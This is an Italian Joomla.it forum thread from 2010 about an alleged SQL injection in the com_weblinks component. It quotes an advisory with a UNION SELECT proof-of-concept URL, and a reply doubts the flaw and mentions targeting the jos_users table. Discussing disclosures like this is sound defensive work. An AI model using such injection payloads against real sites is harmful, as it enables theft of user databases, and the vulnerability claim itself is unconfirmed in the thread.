Joomla.it Forum

Non solo Joomla... => Sicurezza => : jeckodevelopment 13 Jul 2010, 10:56:44

: Joomla Component Weblinks - com_weblinks SQL Injection
: jeckodevelopment 13 Jul 2010, 10:56:44

Non si hanno ancora maggiori informazioni su questa presunta vulnerabilità di tipo SQL Injection di com_weblinks

#################################################################
# Application Info:
# Name: Joomla Component com_weblinks
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
#################################################################
Vulnerability:
http://site.com/index.php?option=com_weblinks&task=view&catid=8&id=-1 UNION
SELECT 1,2,3,4,5
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###################################################################

: Re:Joomla Component Weblinks - com_weblinks SQL Injection
: mau_develop 13 Jul 2010, 11:22:59

mi sono spulciato un po' il codice ma non vedo come possa funzionare, boh ..magari invecchio  :)
... non capisco bene una cosa che nn ho tempo di guardare ora, ma forse c'è qualche possibilità se fosse l'admin ad esploitarsi.

cmq qualsiasi inj funziona se si verifica qs -> from%20jos_users

se avete dato un vostro prefisso siete abbastanza coperti, anche se solitamente resta comunque un "buco" libero alla fantasia

M.